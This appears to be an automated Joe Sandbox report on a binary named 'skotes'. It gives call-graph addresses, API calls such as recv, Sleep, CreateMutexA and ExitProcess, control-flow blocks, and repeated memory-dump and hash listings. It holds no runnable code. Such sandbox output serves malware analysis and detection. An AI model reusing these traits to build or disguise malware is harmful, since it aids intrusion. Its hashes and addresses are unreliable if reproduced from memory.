10080 adcc31 10077->10080 10081 adcc3f InitOnceExecuteOnce 10080->10081 10083 adbef2 10080->10083 10081->10083 10083->10072 10087 adb5d6 10084->10087 10086 ac2472 10088 adb5f1 std::_Throw_future_error 10087->10088 10089 af8bec __cftof 3 API calls 10088->10089 10091 adb658 __cftof std::invalid_argument::invalid_argument 10088->10091 10090 adb69f 10089->10090 10091->10086 10366 ac55f0 10367 ac5610 10366->10367 10368 ac22c0 3 API calls 10367->10368 10369 ac5710 std::invalid_argument::invalid_argument 10367->10369 10368->10367 10370 ac43f0 10371 adbedf InitOnceExecuteOnce 10370->10371 10372 ac440a 10371->10372 10373 ac4411 10372->10373 10374 af6cbb 3 API calls 10372->10374 10375 ac4424 10374->10375 10428 ac3970 10429 adc68b __Mtx_init_in_situ 2 API calls 10428->10429 10430 ac39a7 10429->10430 10431 adc68b __Mtx_init_in_situ 2 API calls 10430->10431 10432 ac39e6 10431->10432 10433 ac2170 10436 adc6fc 10433->10436 10435 ac217a 10437 adc70c 10436->10437 10439 adc724 10436->10439 10437->10439 10440 adcfbe 10437->10440 10439->10435 10441 adccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10440->10441 10442 adcfd0 10441->10442 10442->10437 10092 ac3c8e 10093 ac3c98 10092->10093 10095 ac3ca5 10093->10095 10100 ac2410 10093->10100 10096 ac3810 3 API calls 10095->10096 10097 ac3ccf 10096->10097 10098 ac3810 3 API calls 10097->10098 10099 ac3cdb shared_ptr 10098->10099 10101 ac2424 10100->10101 10104 adb52d 10101->10104 10112 af3aed 10104->10112 10106 ac242a 10106->10095 10107 adb5a5 ___std_exception_copy 10119 adb1ad 10107->10119 10108 adb598 10115 adaf56 10108->10115 10123 af4f29 10112->10123 10114 adb555 10114->10106 10114->10107 10114->10108 10116 adaf9f ___std_exception_copy 10115->10116 10117 adafb2 shared_ptr 10116->10117 10129 adb39f 10116->10129 10117->10106 10120 adb1d8 10119->10120 10121 adb1e1 shared_ptr 10119->10121 10122 adb39f 4 API calls 10120->10122 10121->10106 10122->10121 10124 af4f2e __cftof 10123->10124 10124->10114 10125 afd634 __cftof 3 API calls 10124->10125 10128 af8bfc ___std_exception_copy 10124->10128 10125->10128 10126 af65ed __cftof 3 API calls 10127 af8c2f 10126->10127 10128->10126 10130 adbedf InitOnceExecuteOnce 10129->10130 10131 adb3e1 10130->10131 10132 adb3e8 10131->10132 10140 af6cbb 10131->10140 10132->10117 10141 af6cc7 __dosmaperr 10140->10141 10142 afa671 __cftof 3 API calls 10141->10142 10145 af6ccc 10142->10145 10143 af8bec __cftof 3 API calls 10144 af6cf6 10143->10144 10145->10143 10453 ac9f44 10454 ac9f4c shared_ptr 10453->10454 10455 aca953 Sleep CreateMutexA 10454->10455 10456 aca01f shared_ptr 10454->10456 10457 aca98e 10455->10457 10155 add0c7 10157 add0d6 10155->10157 10156 add17f 10157->10156 10158 add17b RtlWakeAllConditionVariable 10157->10158 10254 ac3c47 10255 ac3c51 10254->10255 10257 ac32d0 5 API calls 10255->10257 10258 ac3c5f 10255->10258 10256 ac3c68 10257->10258 10258->10256 10259 ac3810 3 API calls 10258->10259 10260 ac3cdb shared_ptr 10259->10260 10261 af6a44 10262 af6a5c 10261->10262 10263 af6a52 10261->10263 10266 af698d 10262->10266 10265 af6a76 __freea 10267 af690a __cftof 3 API calls 10266->10267 10268 af699f 10267->10268 10268->10265 10159 ac20c0 10160 adc68b __Mtx_init_in_situ 2 API calls 10159->10160 10161 ac20cc 10160->10161 10162 ace0c0 recv 10163 ace122 recv 10162->10163 10164 ace157 recv 10163->10164 10165 ace191 10164->10165 10166 ace2b3 std::invalid_argument::invalid_argument 10165->10166 10167 adc6ac GetSystemTimePreciseAsFileTime 10165->10167 10168 ace2ee 10167->10168 10169 adc26a 4 API calls 10168->10169 10170 ace358 10169->10170 10171 ac2ec0 10172 ac2f06 10171->10172 10180 ac2f6f 10171->10180 10173 adc6ac GetSystemTimePreciseAsFileTime 10172->10173 10174 ac2f12 10173->10174 10175 ac301e 10174->10175 10179 ac2f1d __Mtx_unlock 10174->10179 10176 adc26a 4 API calls 10175->10176 10177 ac3024 10176->10177 10178 adc26a 4 API calls 10177->10178 10182 ac2fb9 10178->10182 10179->10177 10179->10180 10181 adc6ac GetSystemTimePreciseAsFileTime 10180->10181 10190 ac2fef 10180->10190 10181->10182 10183 adc26a 4 API calls 10182->10183 10184 ac2fc0 __Mtx_unlock 10182->10184 10183->10184 10185 adc26a 4 API calls 10184->10185 10186 ac2fd8 10184->10186 10185->10186 10187 adc26a 4 API calls 10186->10187 10186->10190 10188 ac303c 10187->10188 10189 adc6ac GetSystemTimePreciseAsFileTime 10188->10189 10199 ac3080 shared_ptr __Mtx_unlock 10189->10199 10191 adc26a 4 API calls 10192 ac31cb 10191->10192 10193 adc26a 4 API calls 10192->10193 10194 ac31d1 10193->10194 10195 adc26a 4 API calls 10194->10195 10201 ac3193 __Mtx_unlock 10195->10201 10196 ac31a7 std::invalid_argument::invalid_argument 10197 adc26a 4 API calls 10198 ac31dd 10197->10198 10199->10192 10199->10196 10200 adc6ac GetSystemTimePreciseAsFileTime 10199->10200 10202 ac315f 10199->10202 10200->10202 10201->10196 10201->10197 10202->10191 10202->10194 10202->10201 10217 ac2e00 10218 ac2e28 10217->10218 10219 adc68b __Mtx_init_in_situ 2 API calls 10218->10219 10220 ac2e33 10219->10220 10283 ac8980 10285 ac8aea 10283->10285 10286 ac89d8 shared_ptr 10283->10286 10284 ac5c10 3 API calls 10284->10286 10286->10284 10286->10285 10203 ac9adc 10204 ac9aea 10203->10204 10208 ac9afe shared_ptr 10203->10208 10205 aca917 10204->10205 10204->10208 10206 aca953 Sleep CreateMutexA 10205->10206 10207 aca98e 10206->10207 10209 ac5c10 3 API calls 10208->10209 10210 ac9b7c 10209->10210 10211 ac8b30 3 API calls 10210->10211 10212 ac9b8d 10211->10212 10213 ac5c10 3 API calls 10212->10213 10214 ac9cb1 10213->10214 10215 ac8b30 3 API calls 10214->10215 10216 ac9cc2 10215->10216 10287 ac3f9f 10288 ac3fad 10287->10288 10289 ac3fb6 10287->10289 10290 ac2410 4 API calls 10288->10290 10290->10289 10458 ac215a 10459 adc6fc InitializeCriticalSectionEx 10458->10459 10460 ac2164 10459->10460 9679 aca856 9680 aca892 shared_ptr 9679->9680 9681 aca870 9679->9681 9681->9680 9682 aca953 Sleep CreateMutexA 9681->9682 9683 aca98e 9682->9683 10291 ac2b90 10292 ac2bce 10291->10292 10295 adb7fb 10292->10295 10294 ac2bdb shared_ptr std::invalid_argument::invalid_argument 10296 adb807 10295->10296 10298 adb817 10295->10298 10296->10298 10299 adca78 10296->10299 10298->10294 10300 adca8d TpReleaseWork 10299->10300 10300->10298 10399 add111 10401 add122 10399->10401 10400 add12a 10401->10400 10403 add199 10401->10403 10404 add1a7 SleepConditionVariableCS 10403->10404 10406 add1c0 10403->10406 10404->10406 10406->10401 10407 ac2b10 10408 ac2b1c 10407->10408 10409 ac2b1a 10407->10409 10410 adc26a 4 API calls 10408->10410 10411 ac2b22 10410->10411

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 342 af652b-af6538 call afa302 345 af655a-af656c call af656d ExitProcess 342->345 346 af653a-af6548 GetPEB 342->346 346->345 347 af654a-af6559 346->347 347->345
                                                                                                                                            APIs
                                                                                                                                            • ExitProcess.KERNEL32(?,?,00AF652A,?,?,?,?,?,00AF7661), ref: 00AF6567
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExitProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                            • Opcode ID: f6da16bb7d024bb14481fa939645bb2c28deaf4ee97a885aef9e269b9aab1fd3
                                                                                                                                            • Instruction ID: 7ea21b31355ae16500b14690cf44bbff0ddd3d6939158a4848a4119408ac55db
                                                                                                                                            • Opcode Fuzzy Hash: f6da16bb7d024bb14481fa939645bb2c28deaf4ee97a885aef9e269b9aab1fd3
                                                                                                                                            • Instruction Fuzzy Hash: FCE0C23008010CAFDF35BB98C959EA83B6AEF5274DF004810FE185B222CB36EE81D680

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 6389f5bd6b51a9f7a6ecb1b292ff780f8ddd3d43da9fb04a72bec3ed1aa7ac30
                                                                                                                                            • Instruction ID: 438811a7368fd11d391de88c8fc88daad533ac57a6a788a75551bfc0c5c25b59
                                                                                                                                            • Opcode Fuzzy Hash: 6389f5bd6b51a9f7a6ecb1b292ff780f8ddd3d43da9fb04a72bec3ed1aa7ac30
                                                                                                                                            • Instruction Fuzzy Hash: 32317931B142049BEB08EB7CDD89FAEB7A2EBD1314F20825CE114E73E6C77599808751

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 22 ac9f44-ac9f64 26 ac9f66-ac9f72 22->26 27 ac9f92-ac9fae 22->27 30 ac9f88-ac9f8f call add663 26->30 31 ac9f74-ac9f82 26->31 28 ac9fdc-ac9ffb 27->28 29 ac9fb0-ac9fbc 27->29 34 ac9ffd-aca009 28->34 35 aca029-aca916 call ad80c0 28->35 32 ac9fbe-ac9fcc 29->32 33 ac9fd2-ac9fd9 call add663 29->33 30->27 31->30 36 aca92b 31->36 32->33 32->36 33->28 42 aca01f-aca026 call add663 34->42 43 aca00b-aca019 34->43 38 aca953-aca994 Sleep CreateMutexA 36->38 39 aca92b call af6c6a 36->39 52 aca996-aca998 38->52 53 aca9a7-aca9a8 38->53 39->38 42->35 43->36 43->42 52->53 54 aca99a-aca9a5 52->54 54->53
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000002.00000002.1728308904.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728325404.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728376892.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728393988.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728410983.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728425425.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728439924.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728575553.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728595566.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728625300.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728667216.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728685793.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728703127.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728719428.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728735895.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728754853.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728777674.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728796035.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728812789.0000000000CEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728830374.0000000000CEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728846269.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728868946.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728890625.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728906468.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728921204.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728939078.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728957044.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728972482.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1728987713.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729005543.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729030587.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729045864.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729060101.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729074502.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729090986.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729108609.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729126776.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729143715.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729159536.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729173709.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729215066.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729233401.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729248522.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729264251.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729278705.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729294677.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000002.00000002.1729311788.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_2_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                            • Opcode ID: 629ccf4dd493e1d2aad4dbb2a85d6118da116220e459359532bca7688bd9beca
                                                                                                                                            • Instruction ID: b3ea232376d75600e1bdd28087aea2f435a13e47c1d600e04c37de49c7e6a5da
                                                                                                                                            • Opcode Fuzzy Hash: 629ccf4dd493e1d2aad4dbb2a85d6118da116220e459359532bca7688bd9beca
